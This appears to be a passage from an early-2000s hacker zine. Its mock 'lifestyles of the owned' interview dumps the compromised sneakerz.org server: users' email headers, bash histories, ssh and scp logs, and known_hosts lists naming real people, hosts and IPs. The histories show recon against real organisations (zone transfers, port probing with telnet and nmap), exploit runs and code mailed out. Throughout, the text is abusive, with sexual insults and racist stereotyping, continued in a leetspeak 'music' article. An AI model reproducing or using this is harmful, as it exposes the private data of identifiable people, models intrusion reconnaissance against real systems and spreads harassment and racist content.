bright:Errors-To: announce-admin@bafug.org bright:Reply-To: Bill Fumerola bright:Reply-To: Majordomo@FreeBSD.ORG bright:Reply-To: jgrosch@mooseriver.com bright:To: "Alfred Perlstein" bright:To: "Nick Stee." bright:To: bright:To: Alfred Perlstein bright:To: Bill Fumerola bright:To: Jonathan Lemon Alfred Perlstein bright:To: Josef Grosch bright:To: Nick S. 
bright:To: Tor.Egge@fast.no bright:To: alfred@productionbsd.com bright:To: alfred@wintelcom.net bright:To: alfred@wintelcom.net (Alfred Perlstein) bright:To: announce@bafug.org bright:To: bright@sneakerz.org cr:Delivered-To: cr@sneakerz.org cr:Delivered-To: dial.pipex.com-moduspublicity@dial.pipex.com cr:Delivered-To: mailing list distinctiverecords@listbot.com cr:Disposition-Notification-To: "RetrO" cr:Reply-To: cr:Reply-To: cr:Reply-To: confirm-sub-U-EmGb9P23-UBpOrf15CIYImMZ8@yahoogroups.com cr:Reply-To: confirm-sub-UBu_9nyHo3zeNMDbohWPyl-AC60@yahoogroups.com cr:Reply-To: freestyle@breakbeat.com cr:Reply-To: gay@breakbeat.com cr:Reply-To: root@sneakerz.org cr:To: "'cr@sneakerz.org'" cr:To: "CafePress.com Member" cr:To: "Zarul" , cr:To: "cr" cr:To: cr:To: cr:To: cr:To: cr:To: List Member cr:To: List Owner cr:To: ListBot Member cr:To: Rob Davis ; Rob Hives ; Rob Mac ; Rob Wood ; Toby Martin (E-mail) ; = cr:To: Scott Douglas cr:To: Trevor Wyatt ; Trevor Nelson ; trax ; Tracie storey ; tee bone ; = cr:To: cr@sneakerz.org cr:To: cr@sneakerz.org cr:To: jody.melbourne@itacsecurity.com cr:To: pm@sneakerz.org cr:To: r0n/ Patch / Buddha Man / PLS cr:To: rpm@airmail.net cr:To: undisclosed-recipients:; cr:To: www.inbox.net@airmail.net cr:X-Envelope-To: moduspublicity@dial.pipex.com desl:Delivered-To: desl@sneakerz.org desl:To: Dan Lennon desl:To: desl@sneakerz.org g:Delivered-To: g@sneakerz.org g:Reply-To: "eBay Marketing" g:Reply-To: "eBay" g:Reply-To: Sales@MDaemon.com g:Reply-To: eBay's Scoot Pursuit g:Reply-To: update@update.deerfield.com g:To: g:To: "Glen Messenger (E-mail)" g:To: "Morrison, Garth" , g:To: g@sneakerz.org g:To: valued_customer@deerfield.com g:X-MDaemon-Deliver-To: g@sneakerz.org james:>Delivered-To: josh@strangled.net james:>To: Joshua Anderson james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Delivered-To: 
james:Delivered-To: james@sneakerz.org james:Delivered-To: james@strobe.org james:Errors-To: online1@wellsfargo.m0.net knowfx:>To: ms Essive knowfx:Delivered-To: dskz-outgoing@informationwave.net knowfx:Delivered-To: dskz@informationwave.net knowfx:Delivered-To: knowfx@sneakerz.org knowfx:Delivered-To: mailing list isn@securityfocus.com knowfx:Delivered-To: mailing list staff@staff.neethosting.com knowfx:Delivered-To: moderator for isn@securityfocus.com knowfx:Errors-To: admins-errors@java.blackened.com knowfx:In-Reply-To: <2004@ravine.binary.net> from "redmare" at Mar 23, 2001 01:02:39 PM knowfx:In-Reply-To: <2033@java.blackened.com>; from rockwood@concentric.net knowfx:In-Reply-To: <2087913@java.blackened.com>; from rockwood@concentric.net knowfx:In-Reply-To: <200@java.blackened.com> "from Jill Luster knowfx:In-Reply-To: from Scott knowfx:Reply-To: dskz@informationwave.net soupnazi:Reply-To: "Anissa" soupnazi:Reply-To: "Nuno Fernandes" soupnazi:Reply-To: soupnazi:Reply-To: soupnazi:Reply-To: Nightlife-feedback-25@lb.bcentral.com soupnazi:Reply-To: jeff@altaassociates.com soupnazi:Reply-To: orders@crutchfield.com suid:Delivered-To: BUGTRAQ@securityfocus.com suid:Delivered-To: bugtraq@lists.securityfocus.com suid:Delivered-To: bugtraq@securityfocus.com suid:Delivered-To: suid@sneakerz.org suid:In-Reply-To: suid:Reply-To: root@sneakerz.org suid:Reply-To: suid@SNEAKERZ.ORG suid:To: suid:To: (Recipient list suppressed) suid:To: suid:To: BUGTRAQ@SECURITYFOCUS.COM suid:To: Kris Hunt suid:To: Suid suid:To: suid@SNEAKERZ.ORG suid:To: suid@sneakerz.org suid:X-To: h@CKZ.ORG yowie:Delivered-To: yowie@sneakerz.org yowie:To: Yowie haha, ok check this out oh by the way, I HAVE NEVER BEEN OWNED, AND ALL YOU FUCKERS WHO SAY + YOU OWN ME, YOU DONT OWN SHIT YOU ARE JUST A BUNCH OF COWARDS AND + SCRIPT KIDDIES WHO DONT KNOW JACK SHIT ABOUT ANYTHING. # cd /root # cat .bash_history|less ls more doimport cd src ls make pwd ls -la cd .. 
lso ls sh doimport top top w ps -aux | grep zmagic ps -auwwx | grep zmagic w netstat 1 top w ps -aux | grep zmagic watch -W p7 w top top w ps -aux | grep irc kill -9 9989 ps -aux | grep zmagic w w top top w top w ls top ls ls -la top cd /home/users/zmagic/ ls ls- la ls -la top top last zmagic top ls top cd /home/users/par ls ls -al cd .. cd /home/users/rat ls -al head haha less -R IrcLog cd /home/staff/ps ls -al less .bash_history ps -aux | grep soupnazi watch -W p9 cd /usr/src ls cd /usr/src ls ls -la cd /shit/FreeBSD4/ ls more doimport cd /shit/FreeBSD4/ ls cd cvs/ ls ls -la cd src ls ls -la cd /shit/FreeBSD4/ ls cd svc cd cvs ls cd src/ ls ls -la make buildworld ls ls cvs cvs import cd /usr/src cvs import cvs update ls pwd ls ls-la ls -l cd sys ls ls -l date cd .. ls pwd cd sys ls locate newvers.sh cd /usr/src/sys/conf/ ls df cu -l cuaa0 cd /eyc cd /etc ls cd namedb/ ls cd cd /usr/ports/ ls cd net/ whereis named whereis bind ls cd .. ls cd sysutils/ ls cd .. ls whereis bind whereis bind8 cd net/ ls cd bind8/ make install all cd /etc ls cd namedb/ ls ci named.conf vi named.conf who w write josh who vvcc c who w ps -ax cd /etc ls who w vi named.conf vi named.conf vi named.conf ls sh make-localhost ls vi localhost.rev ls rm localhost.rev ls vi named.conf vi db.127.0.0 vi db.127.0.0 ls pwd w ls vi named.conf vi db.207.154.226 ls vi db.sneakerz ls who cd /etc/namedb/ ls cd /var/log ls tail messages vi /etc/rc.conf ifconfig -a grep named /etc/defaults/rc.conf vi /etc/rc.conf ls vi /etc/rc.conf ls cd ls cd /home/dave l;s cd /home ls cd /home/dave l;s cd /home ls cd staff/ ls cd ps ls cd .. cd josh/ ls cd .. 
cd dave ls ls -al cd vi /etc/group ls ndc start whereis ndc tail messages ssh -p220 dave@t1.google.com who cd /usr/ports/ ls cd irc ls cd epic4/ ls make install all ls cd cd /usr/ports/ ls cd irc ls who write root ssh -p220 dave@t1.google.com who telnet 0 21 who ps -ax ssh -p220 dave@t1.google.com epic w su - dave write root w vi /etc/inetd.conf cd su - dave killall -HUP inetd su - dave write root write root su - dave cd /usr/ports/www/ ls cd w3m su - monk su - dave cd /home/staff/ ls -l josh/ ls -l ps/ cd su - dave write ps w cd /home/nm cd /home/ncvs/ ls screen vi setuid.today grep rc.local /etc/* vi /etc/rc.local vi /etc/virtualip sh /etc/rc.local ifconfig -a w w df w w dmesg grep smurf /usr/ports/INDEX cd /usr/ports/security/smurflog/ ls make w dmesg top w ifconfig -a tcpdump find /sbin -perm 4000 find /sbin -perm -1000 ps ax ls -l /sbin df less /var/log/setuid.today grep root /var/log/messages top last jimjones w hostname we e w ps -ax cd /home ls cd staff/ ls cd /usr/local/apache/htdocs/ ls more index.html cd /shit/FreeBSD4/ cvsup -L 2 supfile export HOME=/root ls pwd ls -la more /home/staff/ps/.bash_history top more /home/staff/ps/.bash_history ht mutt thats history in the making Looking at your history files makes me want to read SECURING LINUX + IN 21 DAYS, all over again. Caviar dreams pm, caviar dreams. yah hehe did you see me ssh into google.com? wish you had my password huh? 
:) :D ok i got so much stuff for your wonderful tv show # cd / # cat sshstuff1 | less home/users/billf/.bash_history:ls -l .ssh/authorized_keys home/users/billf/.bash_history:ls .ssh/ home/users/billf/.bash_history:mkdir .ssh home/users/billf/.bash_history:vi .ssh/authorized_keys home/users/billf/.bash_history:vi .ssh/authorized_keys home/users/cr/.bash_history:ssh -lcr el8.net home/users/cr/.bash_history:ssh -lcr meth.lab.org home/users/cr/.bash_history:ssh -lrogue puck.nether.net home/users/cr/.bash_history:ssh -ls33r freenet.nether.net home/users/james/.bash_history:ssh 209.63.220.137 home/users/james/.bash_history:ssh 64.38.245.135 home/users/james/.bash_history:ssh 64.38.247.160 home/users/james/.bash_history:ssh 64.38.247.180 home/users/james/.bash_history:ssh afraid.org home/users/james/.bash_history:ssh cb2.kglimited.net home/users/james/.bash_history:ssh ns1.kglimited.net home/users/mux/.bash_history:mkdir .ssh home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2 home/users/scott/.bash_history:ssh -l skl pav-l1.hotmail.com home/users/scott/.bash_history:ssh mu.org home/users/suid/.bash_history:cd .ssh home/users/suid/.bash_history:ssh -l suid CPE-61-9-178-2.vic.bigpond.net.au home/users/walt/.bash_history:ssh 216.32.183.201 home/users/walt/.bash_history:ssh -p 216.32.183.201 home/users/walt/.bash_history:ssh 216.32.183.201 home/users/walt/.bash_history:ssh 216.32.183.201 -P home/users/walt/.bash_history:ssh aaronsca@mu.org home/users/walt/.bash_history:ssh pav-l1.hotmail.com # cat scpstuff1 | less home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2 home/users/oobe/.bash_history:scp -v bzImage 64.208.38.1:. home/users/oobe/.bash_history:scp -v bzImage root@64.208.38.2:. home/users/oobe/.bash_history:scp bzImage root@64.208.38.2:. home/users/oobe/.bash_history:scp bzimage root@64.208.38.2:. 
home/users/scott/.bash_history:scp evanw16.Imagine.IL.US.NeverNET.Net 62.252.9.43:~/ home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36,180:. home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36.180:. Ok pm, I am so so so so so sorry to interrupt you, but can + you please show me cr's history file? that, i can do UNIX BOWLERS! # cd /home/users/cr # less .bash_history ls -l /dev/null ls -la .bash_history rm .bash_history grep HIST .* set vi .profile screen -r mutt screen -r screen -r telnet mail.itacsecurity.com 110 telnet mail.itacsecurity.com 110 telnet mail.itacsecurity.com 110 mail telnet mail.itacsecurity.com 25 screen -r screen -r host -l workcover.com telnet www.sb.workcover.com 80 telnet www.sb.workcover.com 443 telnet www.sb.workcover.com 21 ftp www.sb.workcover.com more passwd rm passwd telnet www.sb.workcover.com 23 telnet www.sb.workcover.com 22 telnet www.sb.workcover.com 25 telnet www.sb.workcover.com 110 telnet www.sb.workcover.com 513 telnet www.sb.workcover.com 79 telnet www.sb.workcover.com 111 host -l workcover.com telnet 150.101.73.34 v21 telnet 150.101.73.34 21 telnet 150.101.73.34 22 telnet 150.101.73.34 telnet 150.101.73.35 80 telnet 80 telnet 192.231.203.33 80 telnet 192.231.203.33 21 telnet 192.231.203.33 111 telnet 192.231.203.33 110 telnet 192.231.203.33 22 telnet 192.231.203.33 25 telnet 192.231.203.33 79 whisker.pl host -l workcover.com.au host -l workcover.com telnet www.workcover.com 80 telnet www.internal.workcover.com 80 telnet internal.workcover.com 80 telnet www.school.workcover.com 80 telnet www.users.on.net 110 telnet www.users.on.net 21 nmap 150.101.73.34 exit ls -l screen -r slookup right.behind.you nslookup right.behind.you screen -r script work ls -l work gzip work chmod a-r work.gz ls -l screen -r nslookup www.e-safety.sa.gov.au host -l e-safety.sa.gov.au host -l sa.gov.au mutt screen -r screen -r exit mutt exit host -l workcover.com host -l internal.workcover.com z0ne nslookup 150.101.73.100 nslookup 
150.101.73.101 nslookup 150.101.73.1 nslookup 150.101.73.2 nslookup 150.101.73.34 nslookup 150.101.73.35 nslookup 150.101.72.1 nslookup 150.101.72.2 screen -r exit mutt screen -r mutt screen -r bx cr_ irc.idle.net screen -r more wu261.c more wu261.c more wu2.6.1.c more rh7linuxconf.pl.txt mutt screen -r screen -r mutt screen 0r screen -r mutt exit mutt screen -r screen -r slookup itac1.lnk.asionline.net nslookup itac1.lnk.asiaonline.net nslookup itac1.lnk.cbr.asiaonline.net host -l lnk.asiaonline.net host -l lnk.cbr.asiaonline.net host -l cbr.asiaonline.net nslookup itac1.sbr.asiaonline.net nslookup itac1.cbr.asiaonline.net screen -r mutt screen -r screen -r mutt exit ls exit ls cp admtac0s-bin.gz www lynx sneakerz.org/~cr ls ls -la screen -r screen -r screen -r *.c ls *.c screen -r more wu2.6.1.c screen -r grep site wu*.c screen -r more wu261.c screen -r more wu261.c screen -r screen -r ls screen -r ls more linuxconf.c ssh -ls33r freenet.nether.net telnet freenet.nether.net telnet freenet.nether.net 21 telnet puck.nether.net 22 ssh -lrogue puck.nether.net screen -r ar zxvf linuxconf-xpl.tar.gz tar zxvf linuxconf-xpl.tar.gz more linuxconf-xpl. 
more linuxconf-xpl.c screen -r s ls screen -r screen -r ssh -lcr el8.net screen -r exit screen -r exit screen -r exit set export TERM=vt100 screen -r cd www ;s ls mail guy@breakbeat.com screen -r telnet 150.101.73.100 80 telnet 150.101.73.100 80 telnet 150.101.73.100 80 screen -r ls ls *.c screen -r screen -r ls ls *.c screen -r mutt exit mutt screen -r export IRCNAME="flip the track, bring the oldschool back" bx cr irc.mcs.net screen -S ef bx cr irc.mcs.net telnet 150.101.73.100 80 telnet 150.101.73.100 80 screen -r screen -r exit screen -r lynx www.apache.org lynx www.slashdot.org lynx www.slashdot.org lynx www.slashdot.org lynx www.slashdot.org screen -r exit screen -r mutt tar zxvf work.gz tar zxvf route_finder.tar.gz cd rf ls -l more route_finder more word_route_finder screen -r ls more route_finder ls more word_route_finder ls cd .. ls exit mutt screen -r ls cd rf ls more words rm words ls ls -la cd .. ls *.tar.gz screen -r exit mutt screen -r w screen -r ls -la more linuxconf-xpl.c screen -r ls exit screen -r mutt screen -r telnet 150.101.73.100 80 screen -r exit mutt screen -r host -l workcover.com dig @workcover.com any any telnet 150.101.73.100 80 telnet 150.101.73.100 53 sscreen -r traceroute traceroute 150.101.73.34 screen -r bx cr irc.oz.org screen -r nslookup 203.53.186.41 nslookup 203.53.186.1 mutt screen -r telnet www.afp.gov.au 80 head 3.c screen -r mail buo@ussrback.com date screen -r ls cat 3.c |mail buo@ussrback.com screen -r mutt screen -r clear cd .hi cd rf ls more route_finder ls more word_route_finder q ls screen -r ls more 1.c more 1.c ls more 3.c ls ls *.c more fbsd2.c more fbsd.c more fbsd.c gcc fbsd.c -o fbsd ./fbsd ./fbsd 0 screen -r more fbsd.c qtail fbsd.c tail fbsd.c screen -r ssh -lcr meth.lab.org screen -r ssh -lcr el8.net screen -r nmap ls more crpron cd .. 
screen -r telnet www.horseland.com 80 telnet www.horseland.com 443 screen -r screen -r mutt screen -r screen -r vi cat pro |cut -f2 -d" " cat pro |cut -f2 -d" ">> pro2 more pro2 rm pro* screen -r screen -r bx cr irc.dal.net bx cr irc.austnet.org bx cr irc.undernet.org screen -r exit screen -r nc find / -name nc -print 2>/dev/null screen -r screen -r mutt screen -d -r box to even get questioned by the feds in .au though mutt exit hahahaha pm, I can't stop but ask, why was cr doing nslookup on + right.behind.you? LOL im laughing my ass off it also looks like he tried to own my system with that fbsd.c shit i should kick all these users off and add more elite ones, more + w00w00 people. # cd / # cat bitchxstuff1 | less -rw-r----- 1 cr users 832281 home/users/cr/.BitchX/BitchX.away -rwx------ 1 g users 29427 home/users/g/.BitchX/BitchX.away* -rw-r----- 1 mux users 38061 home/users/mux/.BitchX/BitchX.away -rw-r----- 1 suid users 270331 home/users/suid/.BitchX/BitchX.away -rw------- 1 udp users 5229 home/users/udp/.BitchX/BitchX.away -rw-r----- 1 zmagic users 4312 home/users/zmagic/.BitchX/BitchX.away cr's away file is huge :D i will show it to you later during our private session i would also like to reiterate that I HAVE NEVER BEEN OWNED. ONE DAY + THE POWER SUPPLY BLEW UP BECAUSE A TERMITE ATE THE WOOD CASING. MY + SYSTEM IS NOT DOWN BECAUSE IT WAS HACKED, IT HAS NEVER BEEN HACKED, AND + NONE OF YOU CAN HACK IT. IF ANYONE CAN HACK IT, SHIT, I WILL GIVE THEM + A BLOWJOB COURTESY OF SNEAKERZ (TM) NETWORKS. 
r0b1n, people on my system ssh (not telnet) to some of the most + incredible and secure systems in the universe, take a look see # cd / # cat sshstuff2 | less home/staff/monk/.ssh/known_hosts:funksion.org home/staff/monk/.ssh/known_hosts:9mm.com home/users/awnex/.ssh/known_hosts:shadowside.org home/users/billf/.ssh/known_hosts:elvis.mu.org home/users/billf/.ssh/known_hosts:hate.chc-chimes.com home/users/bright/.ssh/known_hosts:hardcode.wintelcom.net home/users/cr/.ssh/known_hosts:ns6.siteleader.net home/users/cr/.ssh/known_hosts:meth.lab.org home/users/cr/.ssh/known_hosts:61.12.32.120 home/users/cr/.ssh/known_hosts:titus.visual.com home/users/cr/.ssh/known_hosts:www.breakbeat.com home/users/cr/.ssh/known_hosts:breakbeat.com home/users/cr/.ssh/known_hosts:wstrn.com home/users/cr/.ssh/known_hosts:puck.nether.net home/users/cr/.ssh/known_hosts:el8.net home/users/g/.ssh/known_hosts:198.142.183.24 home/users/g/.ssh/known_hosts:yowie.kg home/users/g/.ssh/known_hosts:198.142.196.172 home/users/g/.ssh/known_hosts:203.28.37.130 home/users/g/.ssh/known_hosts:breakbeat.web.us.uu.net home/users/james/.ssh/known_hosts:atlantis.tranquility.net home/users/james/.ssh/known_hosts:0 home/users/james/.ssh/known_hosts:shell1.tranquility.net home/users/james/.ssh/known_hosts:blacklight.strobe.org home/users/james/.ssh/known_hosts:bl.strobe.org home/users/james/.ssh/known_hosts:206.152.119.225 home/users/james/.ssh/known_hosts:tranq3.tranquility.net home/users/james/.ssh/known_hosts:afraid.org home/users/james/.ssh/known_hosts:stats.paycounter.com home/users/james/.ssh/known_hosts:63.195.184.43 home/users/james/.ssh/known_hosts:63.195.184.247 home/users/james/.ssh/known_hosts:63.195.184.126 home/users/james/.ssh/known_hosts:ns1.wintelcom.net home/users/james/.ssh/known_hosts:tranq1.tranquility.net home/users/james/.ssh/known_hosts:jobe.strobe.org home/users/james/.ssh/known_hosts:strobe.org home/users/james/.ssh/known_hosts:64.166.225.94 home/users/james/.ssh/known_hosts:mir.base16.org 
home/users/james/.ssh/known_hosts:home.afraid.org home/users/james/.ssh/known_hosts:cb1.wintelcom.net home/users/james/.ssh/known_hosts:12.153.162.137 home/users/james/.ssh/known_hosts:64.38.247.160 home/users/james/.ssh/known_hosts:64.38.247.180 home/users/james/.ssh/known_hosts:cb2.kglimited.net home/users/james/.ssh/known_hosts2:afraid.org home/users/james/.ssh/known_hosts2:c191933-b.clmba1.mo.home.com home/users/james/.ssh/known_hosts2:home.strobe.org home/users/knowfx/.ssh/known_hosts:132.170.44.44 home/users/james/.ssh/known_hosts2:home.strobe.org home/users/knowfx/.ssh/known_hosts:132.170.44.44 home/users/knowfx/.ssh/known_hosts:neethosting.com home/users/mux/.ssh/known_hosts2:mux.dyn.dhs.org home/users/oobe/.ssh/known_hosts:64.208.38.2 home/users/par/.ssh/known_hosts:65.5.27.115 home/users/par/.ssh/known_hosts:65.5.27.252 home/users/rat/.ssh/known_hosts:port44.dorms44.ucf.edu home/users/reject/.ssh/known_hosts2:zap.netfrag.com home/users/scott/.ssh/known_hosts:mu.org home/users/scott/.ssh/known_hosts:62.252.9.43 home/users/scott/.ssh/known_hosts:pav-l1.hotmail.com home/users/soupnazi/.ssh/known_hosts:216.240.185.234 home/users/soupnazi/.ssh/known_hosts:209.191.170.8 home/users/soupnazi/.ssh/known_hosts:noodle-soup.fortunecity.com home/users/soupnazi/.ssh/known_hosts:postal1.fortunecity.com home/users/soupnazi/.ssh/known_hosts:lower.org home/users/soupnazi/.ssh/known_hosts:132.170.44.44 home/users/soupnazi/.ssh/known_hosts:jimjones.niggacrazy.com home/users/soupnazi/.ssh/known_hosts:legion2000.net home/users/soupnazi/.ssh/known_hosts:shell.openhack.com home/users/soupnazi/.ssh/known_hosts:ws1.nhl.com home/users/soupnazi/.ssh/known_hosts:www.djalterego.com home/users/soupnazi/.ssh/known_hosts:ws4temp.nhl.com home/users/soupnazi/.ssh/known_hosts2:209.191.170.220 home/users/spider/.ssh/known_hosts:64.172.12.3 home/users/suid/.ssh/known_hosts:kernel.net home/users/suid/.ssh/known_hosts:jawa.chilli.net.au home/users/suid/.ssh/known_hosts:yowie.kg 
home/users/suid/.ssh/known_hosts:61.12.32.120 home/users/suid/.ssh/known_hosts:ninjastrike.com home/users/suid/.ssh/known_hosts:cpe-61-9-146-112.vic.bigpond.net.au home/users/suid/.ssh/known_hosts:61.9.146.112 home/users/udp/.ssh/known_hosts:port44.dorms44.ucf.edu home/users/udp/.ssh/known_hosts:coalesce.underworld.net home/users/udp/.ssh/known_hosts:boredom.org home/users/udp/.ssh/known_hosts:voodooland.net home/users/udp/.ssh/known_hosts:leviathan.org home/users/udp/.ssh/known_hosts:fire.efnet.org home/users/walt/.ssh/known_hosts:pav-l1.hotmail.com home/users/walt/.ssh/known_hosts:mu.org home/users/yowie/.ssh/known_hosts:61.12.36.180 home/users/zmagic/.ssh/known_hosts:tdz.dhs.org home/users/zmagic/.ssh/known_hosts:zsh.interniq.org home/users/zmagic/.ssh/known_hosts:132.170.44.12 home/users/zmagic/.ssh/known_hosts:fire.efnet.org home/users/zmagic/.ssh/known_hosts:216.30.134.185 home/users/zmagic/.ssh/known_hosts:users.interniq.org home/users/zmagic/.ssh/known_hosts:syn.ackers.net home/users/zmagic/.ssh/known_hosts:stardust.europeonline.net home/users/zmagic/.ssh/known_hosts:phear.org home/users/zmagic/.ssh/known_hosts2:rain.ktwo.ca home/users/zmagic/.ssh/known_hosts2:frost.ktwo.ca hehe *** r0b1nleech is now known as WOW *** *** WOW is now known as r0b1nleech *** hahahahaha Wow man, hotmail, efnet, ktwo! You are probably the best guest I have ever owned, oops, I mean + interviewed for lyfestylez of the owned and lamest. thanks r0biepoos PART THREE: remind them about the never been owned stuff Caviar dreams. We have just had a guest who personifies the + hacker life style. He hacks, He codes, He works for google, He's worked + for microsoft, He's been around. And one thing I would like to point out + about our guest, is that he has never been owned, and never will be. yup, never been owned See, owning someone this incredibly lame takes an enourmous + amount of skill, which of course, no one has. 
In a fantasy world, where hacking is life, pm, one of the + greatest lamers around, lives the dream, lives the big life, drives + a bmw, and hangs out in #!w00w00. What more can you ask for? I leave + you with this final note: pm, has NEVER, EVER, EVER, EVER, I repeat NEVER EVER EVER + EVER EVER NEVER EVER EVER EVER EVER, been owned. good night, suck my fat dick, and wipe that dangling shit + off the tip of your dick stick. yah bye, btw NEVER BEEN OWNED hah, cya .~e~----------------------------------------------------------~e~. ; *05* muz1k in the undergr0und -- uncle m4v1s ; `----------------------------------------------------------------' muz1k 1n the undergr0und by uncle m4v1s --------------- the p4zt few ye4rz have s33n a surge 0f muz1kal tal3ntz 1n the d1g1t4l undergr0und.... fr0m the 4sh3z 0f g4ngst4h r4p c0mez a new g3nr3 0f muz1k 2 rev0lut10n1z3 the w0rld 4ever... e-thug d1g1t4l r4p. uncle m4v1s h4z k0mp1l3d a l1zt 0f 2dayz *h0ttezt* art1ztz 1n th3 haqr subkultur3 & s0me rev1ewz... the ph4t be4tz and krayzEeE b4ssl1nez u he4r 1n kutt1ng edg3 e-thug d1g1t4l r4p w3r3 pi0neered by n0ne 0ther than the m4ster bl4zt3r h1mself, h4g1z' sh0ckwave r1d3r. sp0rt1ng h1z d33p-runn1n m1ztruzt 0f auth0rity 4nd h1z 1ntim8 kn0wledge 0f g4ng w4rf4re, the acqu1z1ti0n 0f 1llegal drugz & weap0nz, & the cl0zely gu4rd3d s3kr3t 0f h0w 2 h1t th3 g-sp0t in 0ver 38 unique w4yz, he sh0qd th3 w0rld by pl4c1ng sh4dy & kl3v3rly w0rd3d c4tch phr4sez 1n h1z IRCNAME variable. h3 br0ught h0n0r 2 h1z ment0rz eazy-e and chuck-d by pr0v1d1ng 1nexper13nz3d wh1te k1dz on 1rc w1th 4 d4nger0us and 4st0und1ng 1ns1ght 1n-2 wh4t 1t m34nz 2 b3 black, r3f3r3nc1ng such 1rc n4m3z az "1t t4k3z 4 n4t10n 0f m1ll1i0nz 2 h0ld my saq" [see publ1k 3n3my, 54]. 0ften th3z3 0bskure l1n3z w0uld s3nd phell0w f@ wh1t3 h4qrz dr3ss3d in BDUz & k0mbat b00tz runn1ng 2 g00gl3. wh3n mb'z st4tuz az an undergr0und br0th4 wuz f1nal1zed [see "blaq 1z merely 4 st4t3 0f m1nd", 82] 0therz were s00n 2 f0ll0w. 
so1o 0f ph4med t33n haqr/he4rtThr0bz c0deZerO k0mb1n3d h1z sk1ll3d kn0wledg3 0f purch4z1ng n1qlb4gz & begg1ng 4 k04dz wh3n h3 c0ined th3 3ver s0-p0pular k4tch phr4ze "y() d4wg, 5up." & the r3zt u kn0w 1z h1zt0ry. u k4n r34d m0re inph0 ab0ut s1 in m1ke sch1ffman'z upk0m1ng b00k ent1tl3d "br0, 1m a h4qr n0t a k0d3r" (ISBN 835827577158). th0 d1g1t4l thugz in tha 2K+2 may !have (th4tz a l0g1k4l neg4t10n, or "n0t have" 4 u untekn1k4l read3rz) even h34rd 0f nw4, they st1ll r3pruhz3nt the s4me c0ld he4rt-0f- d4rkn3zz / str8 phr0m s0uth c3ntr4l m3nt4l1ty th@ fu3l3d f34tz 0f m4str haqry 1n the m1d 90z, such 4z the t4ktik4l l0gic-b0mb 1mpl4nt3d 1n-2 yah00. s0me k0mpl41n th@ the 1rc thugz 0f the new m1ll3nn1um h4ve l0st ph0kuz 0f kreat1ng hypn0t1z1ng phreakyPhr3$h phl0w & r 2 kaught up 1n s3ll1ng drugz 0n 3fn3t 0r putt1ng up p1cz 0f the1r n3w r1mz 0n th31r h3rt.0rg h0mepagez, but u k4n dec1de 4 y0urself. ytcracker [the 0r1g1n4l d1g1t4l g4ng3r] --------------------------------------- th3 f1rzt 2 expl1c1tly use the t3rm '0r1g1n4l d1g1t4l g4ngst4h' when h3 gr4ff3d h1z mug 0n th3 dcaa website 11/23/99. the e-g1f p1ktur3, l00s3ly b4s3d 0n 4 ph0t0 t4k3n dur1ng th3 #sesame str33t 1rc sh0wd0wn sh0wz a rugg1sh thugg1sh y0ung yT, dr3zz3d 4 b1t l1ke kR4zy t3d k4cz1nszky [s33 http://www.paybackprod.com/hackedsites/dcaa] w1th wh4t app34rz 2 be a huge g0ld ch41n k00l3ct3d phr0m 3 m0nthz 0f p4wn1ng m0sth8d's e-l00t. th0 2 many @ ph1rst gl4nc3 h3 appe4rz 2 be we4r1ng a pe4c3 symb0l, rum0rz circul8 th@ yT l00ted th1z r3l1c 4ft3r gunn1ng d0wn a f4m1ly 0f as14n sh0p0wn3rz 1n k0ld bl00d in the inf4m0uz LA ri0tz. st1ll 0therz s4y 1t 1z n0t a p34c3 symb0l @-all, but r34lly a h00d 0rnament st0len phr0m shuge kn1ghtz benz!! whut3v3r the true st0ry 1z, ytcraqr h4z k0nt1nu3d 2 1nsp1r3 y0ung e-thugz w0rldw1d3. 1t 1z rep0rt3d th@ ytkrakr mp3z r h3r4d 4z f4r away az k4r4ch1, wh3r3 h1z pr0tegez gf0rce p4k1st4n h4v3 sh0qd l0c4l m0squez by bl4stn d1g1t4l h1ph0p 0uts1d3. 
1n p4k1st4n, wh3r3 l1n0leum phl00rz r unava1lable, 0ne gf0rce member, german_gu c4us3d qu1te a st1r by bec0ming the ph1rzt musl1m bb0y 2 buzt 0ut 1n2 a w1ndm1ll 0n hiz pr4y3r m4t. unphortun4tely, m0zt 0f yTcr4ck3rz w0rk 1z unr3l34z3d, & un4v4il4ble 4 d0wnl0ad. but 2 m4ny, th1z d0eznt m4tt3r, 4 th0ze wh0 v1e3 h1m 4z an 1k0n 0f s1n & rebell10n. yt iz str8 up p10n33r. r00tabega --------- 4z they r kall3d 0n their page, "r00tabega: 1ndepend3nt hyde p4rk h1p h0p." damn h0w d0 i descr1be th1z except az 'pr0l1f1k.' bansh33 p0pz 0ut new rele4s3z ph4ster th4n 0l d1rty bast4rd k4n get b1tchez pregn4nt. u k4n ch3ck 0ut th3z3 b34tz @ http://www.r00tabega.org/rap th31r l8zt release 1z kalled 'the c0c00n' & m4n 1tz exxxxxxxxxXtra phantast1kly phre$$$$$$$$$h. r00tabegz phearl3zz leader 1z r1shi bh4t, u m1ght r3m3mb3r h1m az th3 ugly l1tl krumbsn4tchr phr0m th3 ph1lm 'th3 1nd14n 1n the cupb04rd.' u kan ch3ck h1z interv1ew @ http://www.rediff.com/chat/trans/0216rish.htm 4z we k4n c y0ung r1sh1 1z a k0l0rful ch4r4ct3r; he st4rt3d haqng PRIMOS @ the age 0f 6, & wuz 1nsp1r3d 2 freestyle apht3r 0wn1ng h1z 1zt DMS100. wh4t d0ez r1sh1 d0 4 fun? w3ll the maztr h1mself repliez: "Programming, Tennis, Piano, Clarinet, Rapping." r00tabega, wh1ch ink0rp0r8z inkredible muzik4l/haqng t4l3ntz such as the 1ncred1bl3 "busdr1v3r" (hehe he g0t th1z n4m3 k0z he takez u all 2 sk00l!) and bansh33, r seen by m4ny 4z a resp0nse 2 the 1nf4m0uz "ICY HOT STUNTAHZ," an0th3r tr10 0f rap superstarZzzZ wh0 h4v3 b33n kn0wn 2 frequent the 3r1z PHR33 netw0rkz but d0 n0t h4ck. 2 bansh33 th1z 1z 4ll th3 d1ff3r3nc3. wh3n 4sk3d ab0ut h1z op1n10n 0f the 1cy h0t stunt4hz h3 pau4z3d 4 a m0ment, t0ld me 2 "h0ld up d4wg" and st4rt3d t4pp1ng h1z f00t (he 0nly wearz LuGZ), 